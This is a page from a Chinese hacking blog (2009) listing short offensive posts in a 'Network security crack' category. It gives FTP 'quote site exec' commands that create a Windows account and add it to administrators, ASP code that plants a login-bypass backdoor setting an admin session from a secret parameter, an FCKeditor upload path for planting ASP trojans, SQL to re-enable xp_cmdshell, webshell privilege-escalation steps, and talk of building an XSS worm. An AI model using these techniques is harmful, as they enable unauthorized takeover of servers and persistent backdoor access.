P9’s BLOG
msgbartop
同一天地间,同一网络下,P9′Blog与您共享今日互联网→WWW.P9.NET.CN
msgbarbottom

16 三 09 ftp命令quote site exec的使用

ftp命令

ftp命令

在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:quote site exec net user 用户名 密码 /add 添加一个用户

quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组

quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程

quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程

quote site exec net stop iisadmin 停止 iis 服务

quote site exec net start iisadmin 启动 iis 服务

收藏、分享这篇文章!

Tags: ,

Filed in Network security crack with 0 Comments

14 三 09 WEBSHELL直接进入后台

安全

安全

首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的之间加上

dim id
id=trim(request(“qwe”))
if id=”120″ then
session(“AdminName”)=”管理员用户名”
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)

收藏、分享这篇文章!

Tags:

Filed in Network security crack with 0 Comments

14 三 09 fckeditor漏洞利用

安全

安全

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。
如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

收藏、分享这篇文章!

Tags:

Filed in Network security crack with 0 Comments

12 三 09 webshell提权

tiquan作者:唐钰小宝 本文由p9′blog转自华夏论坛

原文地址:http://bbs.77169.com/read-htm-tid-239508-fpage-5.html

1.看命令行组件是否存在wscript.shell

2.看系统版本,权限大就直接在C盘看,cmd下,set命令看下就OK!windows的为03,WINNT的为2000 (全文…)

收藏、分享这篇文章!

Tags: ,

Filed in Network security crack with 0 Comments

11 三 09 恢复执行xp_cmdshell

tiquan1 未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕 (全文…)

收藏、分享这篇文章!

Tags: ,

Filed in Network security crack with 0 Comments

11 三 09 NET版本Serv-U提权程序

tiquan<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”System.Net.Sockets” %>
<script runat=”server”>

(全文…)

收藏、分享这篇文章!

Tags: , ,

Filed in Network security crack with 0 Comments

09 三 09 入侵windows xp系统常用的七大招数

安全

安全

第一招:屏幕保护
  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。
  提示:部分设计不完善的屏幕保护程序没有屏蔽系统的 (全文…)

收藏、分享这篇文章!

Tags: ,

Filed in Network security crack with 0 Comments

08 三 09 MSSQLCracker in ASP提权方法

收藏、分享这篇文章!

Tags: ,

Filed in Network security crack with 0 Comments

07 三 09 介绍几个同ip地址反查域名的网站

安全

安全

p9’s blog to:www.p9.net.cn

排名第一的当然是http://www.myipneighbors.com/不过近期升级遇到了麻烦停止服务2个多月了,但是它的站长并没有放弃,正在努力寻求解决中.

排名第二的ip地址反查域名网站我给了国内的http://ip.wen.la/不为别的就因为它的信息全,同一IP在国 (全文…)

收藏、分享这篇文章!

Tags: , ,

Filed in Network security crack with 1 Comment

06 三 09 Ajax如何进行跨域操作

安全

安全

author:4lert
form:[H.S.G] http://www.3hsg.net

今天spz发现了一个blog社区的极其严重的xss漏洞,于是我便萌发了写一个xss worm的想法。在写的过程中遇到了很多的问题,最大最大的问题就是ajax的跨域问题。因为你请求的页面和请求处理页面不在一个域里面,所以就会出现跨域的问题,JS报错提示为“没有权限”,这就是所谓的跨域问题! (全文…)

收藏、分享这篇文章!

Tags:

Filed in Network security crack with 0 Comments
 Page 3 of 4 « 1  2  3  4 »
sidebartop

Categories

sidebarbottom
sidebartop

Tag Cloud

0day 360安全浏览器 amd Chrome cpu intel kav kis theworld VB编程 windows Windows 7 Windows 7 windows xp wp技巧 wp插件 五笔输入法 傲游浏览器 免费空间 免费网盘 卡巴斯基 唠叨唠叨 域名 小说 开心网 打印机 提权 攻略 新奇网站 杀毒软件 流氓老师 浏览器 火狐浏览器 电信 电脑手机 百度 系统优化 系统补丁 绿色软件 美女 考试 视频 迅雷 驱动 黑客
sidebarbottom
sidebartop

Random posts

sidebarbottom
sidebartop

Blogroll

sidebarbottom
© P9’s BLOG → www.p9.net.cn: 皖ICP备07005852号